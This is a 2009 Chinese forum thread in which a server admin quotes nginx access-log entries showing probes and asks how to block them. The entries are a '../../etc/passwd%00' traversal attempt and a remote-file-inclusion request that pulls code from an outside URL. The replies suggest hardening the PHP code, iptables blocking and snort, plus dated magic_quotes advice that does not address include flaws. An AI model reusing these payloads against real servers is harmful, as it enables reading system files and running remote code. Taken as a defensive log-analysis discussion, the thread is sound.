如何杜绝这类的旁注攻击

00306

单位有台服务器是nginx+php+mysql架构，近日访问日志里有很多这样的记录，很明显是有人想试图进一步获得权限，请问各位高人有没有什么办法可以解决这样的问题啊？有的话请详细说一说

［code]
206.57.28.62 - - [05/Jun/2009:01:55:06 +0800] GET /flash/admin.php?action=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 "404" 18274 "-" "libwww-perl/5.805" "77.221.130.2, 217.212.252.82"
8.18.42.94 - - [05/Jun/2009:01:55:08 +0800] GET /flash/admin.php?action=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 "404" 18273 "-" "libwww-perl/5.805" "77.221.130.2, 217.212.252.82"
8.14.192.37 - - [05/Jun/2009:01:56:32 +0800] GET /solar-power-led-battery-free%20.../flash/admin.php?action=http://www.raindrip.com/cms/id.txt???? HTTP/1.1 "404" 18412 "-" "libwww-perl/5.79" "218.234.21.178, 211.175.153.78"
[/code]

只爱睡觉

这未必就是worm的试探，从上边来看入侵者想通过include的漏洞
来包含文件而已。

00306

我的意思是有没有办法限制用户不能使用这些../和???符号

chenyx

../和?符号都是标准的http字符,没办法限制的

00306

那有什么办法阻止这些蠕虫程序的试探呢？

kns1024wh

这个限制 尽量看看php上的程序是否足够的完善和严谨

小木虫子

原帖由 00306 于 2009-6-9 10:57 发表
单位有台服务器是nginx+php+mysql架构，近日访问日志里有很多这样的记录，很明显是有人想试图进一步获得权限，请问各位高人有没有什么办法可以解决这样的问题啊？有的话请详细说一说

［code]
206.57.28.62  ...

magic_quotes_gpc = On,这个默认是开的,转义用的, get,post,cookie里的引号变为斜杠,如值 (It's "PHP!") 会自动转换成 (It\'s \"PHP!\") 如果不想转成”\”的话,可以在magic_quotes_sybase = On设置为开,他就把单引号转成双引了,这个可以虚张声势.

luo118

1 個人建議寫個shell
找一個共同點後，show 出IP如下
這就是一個位一性 ../../../../../../../../../../../../../etc/passwd,  show 出些這些所有問題，提取IP段，使用IPtables 阻止，  shell 放到計劃任務中，10分鍾去一次腳本

2 建義使用 snort +iptables 這些詳細CU中搜一下吧